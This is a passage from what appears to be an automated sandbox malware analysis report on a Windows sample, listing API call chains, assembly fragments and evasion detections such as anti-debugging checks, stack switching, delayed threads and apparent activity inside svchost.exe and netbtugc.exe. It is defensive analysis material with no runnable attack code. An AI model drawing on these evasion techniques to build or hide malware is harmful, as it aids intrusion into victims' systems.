00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: fJD7ivEnzm.exeStatic PE information: real checksum: 0xa961f should be: 0x160b2e
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403060 push eax; ret 1_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004160FC push 00000030h; retf 1_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041789B push C5503231h; retf 1_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041613C push 00000030h; retf 1_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D211 pushad ; ret 1_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004132A3 push esi; ret 1_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041136F push edi; retf 1_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417CFB push 789F05E2h; iretd 1_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004135D8 push ds; retf 1_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004135E3 push ds; retf 1_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414594 push edi; retf 1_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E67B push ebp; retf 1_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E61E push eax; retf 1_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E6DA pushad ; ret 1_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004016F6 push ss; ret 1_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417FCB push edx; iretd 1_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401FF6 push ecx; ret 1_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035309AD push ecx; mov dword ptr [esp], ecx1_2_035309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AB225F pushad ; ret 6_2_03AB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AB27FA pushad ; ret 6_2_03AB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE09AD push ecx; mov dword ptr [esp], ecx6_2_03AE09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AB283D push eax; iretd 6_2_03AB2858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AB1368 push eax; iretd 6_2_03AB1369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EE30C push edi; retf 6_2_032EE30F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F0240 push esi; ret 6_2_032F0245
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0330452B push ds; iretd 6_2_0330454B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F0575 push ds; retf 6_2_032F058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F0580 push ds; retf 6_2_032F058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F4838 push C5503231h; retf 6_2_032F4840
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeAPI/Special instruction interceptor: Address: 4199AA4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3770Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6202Jump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85135
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeAPI coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452Thread sleep count: 3770 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452Thread sleep time: -7540000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452Thread sleep count: 6202 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452Thread sleep time: -12404000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe TID: 5228Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe TID: 5228Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032FC2C0 FindFirstFileW,FindNextFileW,FindClose,6_2_032FC2C0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: IqZHJpXEsts.exe, 00000007.00000002.3639353647.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: firefox.exe, 00000008.00000002.2391720024.00000228E238C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeAPI call chain: ExitProcess graph end nodegraph_0-84822
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004172B3 LdrLoadDll,1_2_004172B3
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_041986D0 mov eax, dword ptr fs:[00000030h]0_2_041986D0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_04199D10 mov eax, dword ptr fs:[00000030h]0_2_04199D10
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_04199D70 mov eax, dword ptr fs:[00000030h]0_2_04199D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov ecx, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA352 mov eax, dword ptr fs:[00000030h]1_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D8350 mov ecx, dword ptr fs:[00000030h]1_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D437C mov eax, dword ptr fs:[00000030h]1_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C310 mov ecx, dword ptr fs:[00000030h]1_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550310 mov ecx, dword ptr fs:[00000030h]1_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov ecx, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h]1_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h]1_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EC3CD mov eax, dword ptr fs:[00000030h]1_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B63C0 mov eax, dword ptr fs:[00000030h]1_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035663FF mov eax, dword ptr fs:[00000030h]1_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355438F mov eax, dword ptr fs:[00000030h]1_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355438F mov eax, dword ptr fs:[00000030h]1_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A250 mov eax, dword ptr fs:[00000030h]1_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536259 mov eax, dword ptr fs:[00000030h]1_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h]1_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h]1_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B8243 mov eax, dword ptr fs:[00000030h]1_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B8243 mov ecx, dword ptr fs:[00000030h]1_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534260 mov eax, dword ptr fs:[00000030h]1_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534260 mov eax, dword ptr fs:[00000030h]1_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534260 mov eax, dword ptr fs:[00000030h]1_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352826B mov eax, dword ptr fs:[00000030h]1_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352823B mov eax, dword ptr fs:[00000030h]1_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h]1_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h]1_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h]1_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h]1_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h]1_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h]1_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h]1_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h]1_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h]1_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h]1_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C62A0 mov ecx, dword ptr fs:[00000030h]1_2_035C62A0
